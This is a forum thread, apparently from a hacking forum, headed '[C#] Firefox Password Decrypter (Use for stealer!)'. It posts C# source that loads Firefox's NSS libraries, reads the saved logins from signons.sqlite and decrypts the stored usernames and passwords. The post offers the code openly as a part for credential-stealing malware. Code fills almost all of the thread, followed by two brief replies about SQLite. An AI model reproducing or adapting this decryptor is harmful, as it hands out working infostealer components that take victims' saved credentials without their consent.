Found this code out of boredom. So here it is!
PHP Code:
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Data;
using SQLiteWrapper;
using System.Text;
namespace DarkSelFFDecryptor
//Firefox 3.5 and 3.6 Decryptor
//Coded by DarkSel
//Email and MSN:
//Made January 30, 2010
//Credits to CodeProject for the SQLiteWrapper class
//Shouts to Steve, Son1cBl4st, Farhan878, Fenimin, Aeonhack,
//Albertino, JapaBrz, and all the other coders I grew up with!
//If you used this in your program, add me in the credits!
static class FFDecryptor
public class SHITEMID
public static long cb;
public static byte[] abID;
public struct TSECItem
public int SECItemType;
public int SECItemData;
public int SECItemLen;
private static extern IntPtr LoadLibrary(string dllFilePath);
static IntPtr NSS3;
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
public delegate long DLLFunctionDelegate(string configdir);
public static long NSS_Init(string configdir)
string MozillaPath = Environment.GetEnvironmentVariable("PROGRAMFILES") + @"\Mozilla Firefox\";
LoadLibrary(MozillaPath + "mozcrt19.dll");
LoadLibrary(MozillaPath + "nspr4.dll");
LoadLibrary(MozillaPath + "plc4.dll");
LoadLibrary(MozillaPath + "plds4.dll");
LoadLibrary(MozillaPath + "ssutil3.dll");
LoadLibrary(MozillaPath + "sqlite3.dll");
LoadLibrary(MozillaPath + "nssutil3.dll");
LoadLibrary(MozillaPath + "softokn3.dll");
NSS3 = LoadLibrary(MozillaPath + "nss3.dll");
IntPtr pProc = GetProcAddress(NSS3, "NSS_Init");
DLLFunctionDelegate dll = (DLLFunctionDelegate)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate));
return dll(configdir);
public delegate long DLLFunctionDelegate2();
public static long PK11_GetInternalKeySlot()
IntPtr pProc = GetProcAddress(NSS3, "PK11_GetInternalKeySlot");
DLLFunctionDelegate2 dll = (DLLFunctionDelegate2)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate2));
return dll();
public delegate long DLLFunctionDelegate3(long slot, bool loadCerts, long wincx);
public static long PK11_Authenticate(long slot, bool loadCerts, long wincx)
IntPtr pProc = GetProcAddress(NSS3, "PK11_Authenticate");
DLLFunctionDelegate3 dll = (DLLFunctionDelegate3)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate3));
return dll(slot, loadCerts, wincx);
public delegate int DLLFunctionDelegate4(IntPtr arenaOpt,IntPtr outItemOpt, StringBuilder inStr, int inLen);
public static int NSSBase64_DecodeBuffer(IntPtr arenaOpt, IntPtr outItemOpt, StringBuilder inStr, int inLen)
IntPtr pProc = GetProcAddress(NSS3, "NSSBase64_DecodeBuffer");
DLLFunctionDelegate4 dll = (DLLFunctionDelegate4)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate4));
return dll(arenaOpt, outItemOpt, inStr, inLen);
public delegate int DLLFunctionDelegate5(ref TSECItem data, ref TSECItem result, int cx);
public static int PK11SDR_Decrypt(ref TSECItem data, ref TSECItem result, int cx)
IntPtr pProc = GetProcAddress(NSS3, "PK11SDR_Decrypt");
DLLFunctionDelegate5 dll = (DLLFunctionDelegate5)Marshal.GetDelegateForFunctionPointer(pProc, typeof(DLLFunctionDelegate5));
return dll(ref data, ref result, cx);
public static string signon;
static void Main(string[] args)
Console.Title = "Firefox 3.5 & 3.6 Decryptor";
Console.WriteLine("Firefox 3.5 & 3.6 Decryptor in C#");
Console.WriteLine("Coded by DarkSel (");
bool FoundFile = false;
long KeySlot = 0;
string MozillaPath = Environment.GetEnvironmentVariable("PROGRAMFILES") + @"\Mozilla Firefox\";
string DefaultPath = Environment.GetEnvironmentVariable("APPDATA") + @"\Mozilla\Firefox\Profiles";
string[] Dirs = Directory.GetDirectories(DefaultPath);
foreach (string dir in Dirs)
if (!FoundFile)
string[] Files = Directory.GetFiles(dir);
foreach (string CurrFile in Files)
if (!FoundFile)
if (System.Text.RegularExpressions.Regex.IsMatch(CurrFile, "signons.sqlite"))
signon = CurrFile;
string dataSource = signon;
TSECItem tSec = new TSECItem();
TSECItem tSecDec = new TSECItem();
TSECItem tSecDec2 = new TSECItem();
byte[] bvRet;
SQLiteBase db = new SQLiteBase(dataSource);
DataTable table = db.ExecuteQuery("SELECT * FROM moz_logins;");
DataTable table2 = db.ExecuteQuery("SELECT * FROM moz_disabledHosts;");
Console.WriteLine("---Excluded hosts---");
foreach (DataRow row in table2.Rows)
KeySlot = PK11_GetInternalKeySlot();
PK11_Authenticate(KeySlot, true, 0);
Console.WriteLine("---Saved Users & Passwords---");
foreach (System.Data.DataRow Zeile in table.Rows)
string formurl = System.Convert.ToString(Zeile["formSubmitURL"].ToString());
Console.WriteLine("URL: " + formurl);
StringBuilder se = new StringBuilder(Zeile["encryptedUsername"].ToString());
int hi2 = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se, se.Length);
TSECItem item = (TSECItem)Marshal.PtrToStructure(new IntPtr(hi2), typeof(TSECItem));
if (PK11SDR_Decrypt(ref item, ref tSecDec, 0) == 0)
if (tSecDec.SECItemLen != 0)
bvRet = new byte[tSecDec.SECItemLen];
Marshal.Copy(new IntPtr(tSecDec.SECItemData), bvRet, 0, tSecDec.SECItemLen);
Console.WriteLine("USER: " + System.Text.Encoding.ASCII.GetString(bvRet));
StringBuilder se2 = new StringBuilder(Zeile["encryptedPassword"].ToString());
int hi22 = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se2, se2.Length);
TSECItem item2 = (TSECItem)Marshal.PtrToStructure(new IntPtr(hi22), typeof(TSECItem));
if (PK11SDR_Decrypt(ref item2, ref tSecDec2, 0) == 0)
if (tSecDec2.SECItemLen != 0)
bvRet = new byte[tSecDec2.SECItemLen];
Marshal.Copy(new IntPtr(tSecDec2.SECItemData), bvRet, 0, tSecDec2.SECItemLen);
Console.WriteLine("PASSWORD: " + System.Text.Encoding.ASCII.GetString(bvRet));
Results 1 to 3 of 3
- 24 Aug. 2010 06:19pm #1
[C#] Firefox Password Decrypter (Use for stealer!)
- 04 Nov. 2010 01:36am #2
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- 04 Nov. 2010 03:01am #3
Did a quick google search, im sure you can find them here:
SQLite CVSTrac